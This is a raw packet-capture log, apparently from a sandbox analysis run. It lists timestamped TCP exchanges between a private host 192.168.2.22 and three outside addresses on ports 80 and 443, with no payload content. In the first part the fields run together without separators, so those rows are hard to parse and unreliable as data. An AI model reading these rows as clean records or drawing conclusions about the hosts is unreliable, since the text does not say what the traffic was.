                                        Sep 9, 2024 17:34:35.815217018 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815227985 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815237999 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815272093 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.815272093 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.815303087 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815314054 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815323114 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815335035 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815351009 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.815351009 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.815398932 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.815413952 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815426111 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815437078 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.815468073 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.815469027 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.855892897 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.855931044 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.855943918 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.856019020 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.858685970 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901381016 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901434898 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901463985 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901477098 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901521921 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901527882 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901540995 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901554108 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901562929 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901585102 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901597023 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901603937 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901653051 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901653051 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901694059 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901705980 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901711941 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901734114 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901743889 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901772022 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901838064 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901849985 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901860952 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901873112 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901882887 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901884079 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901895046 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901896000 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901909113 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901909113 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901921988 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901926041 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901941061 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901954889 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901958942 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901995897 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902333975 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902374029 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902404070 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902415991 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902440071 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902544022 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902555943 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902568102 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902579069 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902585983 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902601004 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902617931 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902666092 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902681112 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902693987 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902699947 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902709007 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902718067 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902721882 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902730942 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902741909 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902757883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903158903 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903203964 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903213978 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903225899 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903264999 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903264999 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903304100 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903315067 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903326988 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903340101 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903341055 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903358936 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903368950 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903471947 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903484106 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903496981 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903508902 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903512955 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903522015 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903527975 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903537035 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903542042 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903549910 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903556108 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903565884 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903572083 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903584957 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903598070 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904062986 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904112101 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904155016 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904167891 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904228926 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904232979 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904244900 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904256105 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904268980 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904273033 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904288054 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904303074 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904306889 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904337883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.906527996 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.906570911 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.906603098 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.906637907 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907259941 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907306910 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907313108 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907325983 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907346010 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907381058 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907398939 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907418966 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907421112 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907430887 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907433987 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907444000 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907483101 CEST4916980192.168.2.2285.239.241.184
Sep 9, 2024 17:34:35.907550097 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907563925 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907576084 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907587051 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907592058 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907603979 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907605886 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907618999 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907618999 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907632113 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907636881 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907644987 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907651901 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907665014 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907676935 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907747030 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907779932 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907793045 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907804012 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907820940 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907835960 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907901049 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907912970 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907926083 CEST  80  49169  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:35.907951117 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:35.907965899 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:37.186203957 CEST  49169  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:38.735531092 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:38.735580921 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:38.735646009 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:38.742341995 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:38.742352962 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.332942963 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.333224058 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.354943991 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.354971886 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.355284929 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.559410095 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.559489965 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.579346895 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.619410992 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.756659031 CEST  80  49167  85.239.241.184  192.168.2.22
Sep 9, 2024 17:34:39.756737947 CEST  49167  80  192.168.2.22  85.239.241.184
Sep 9, 2024 17:34:39.823189020 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.823225021 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.823251963 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.823291063 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.823318958 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.823334932 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.823359013 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.823712111 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.845911026 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.845941067 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.845966101 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.845978022 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.845989943 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.846124887 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.888444901 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.888484001 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.888520002 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.888535023 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.888550997 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.888550997 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.919493914 CEST  80  49164  95.217.202.210  192.168.2.22
Sep 9, 2024 17:34:39.919568062 CEST  49164  80  192.168.2.22  95.217.202.210
Sep 9, 2024 17:34:39.919688940 CEST  49164  80  192.168.2.22  95.217.202.210
Sep 9, 2024 17:34:39.924663067 CEST  80  49164  95.217.202.210  192.168.2.22
Sep 9, 2024 17:34:39.931716919 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.931755066 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.931792021 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.931807041 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.931827068 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.931909084 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.933300018 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.933326006 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.933351040 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.933356047 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.933389902 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.933614016 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.934977055 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.935002089 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.935036898 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.935043097 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.935065031 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.935265064 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.996994972 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.997025967 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:39.997168064 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.997168064 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:39.997196913 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.005069017 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.018836021 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.018909931 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.018937111 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.018960953 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.018975019 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.019515038 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.019541025 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.019558907 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.019567966 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.019579887 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.020595074 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.020613909 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.020636082 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.020642996 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.020654917 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.021684885 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.021711111 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.021727085 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.021733046 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.021745920 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.023302078 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.023343086 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.023351908 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.023391962 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.030991077 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.030993938 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.031043053 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.061798096 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.061826944 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.061856985 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.061862946 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.061881065 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.062001944 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.062165976 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.062194109 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.062217951 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.062222958 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.062239885 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.062592983 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.083816051 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.083848000 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.083877087 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.083883047 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.083900928 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.084074974 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.105602980 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.105633974 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.105668068 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.105676889 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.105700016 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.105732918 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.105763912 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.105787039 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.105792046 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.105815887 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.105942965 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.106450081 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.106486082 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.106513023 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.106518984 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.106539011 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.106708050 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.107259989 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.107286930 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.107316017 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.107321024 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.107343912 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.107635021 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.107661009 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.107695103 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.107702971 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.107727051 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.148885012 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.148910999 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.148953915 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.148960114 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.148982048 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.170157909 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.170228004 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.170232058 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.170264006 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.170296907 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.170629978 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.170696020 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.170696020 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.170728922 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.170758009 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.192127943 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.192187071 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.192202091 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.192225933 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.192251921 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.192583084 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.192640066 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.192646027 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.192668915 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.192698956 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.193053007 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193103075 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.193114042 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193140984 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193188906 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.193195105 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193561077 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193610907 CEST  49170  443  192.168.2.22  207.241.227.96
Sep 9, 2024 17:34:40.193615913 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193630934 CEST  443  49170  207.241.227.96  192.168.2.22
Sep 9, 2024 17:34:40.193681955 CEST  49170  443  192.168.2.22  207.241.227.96
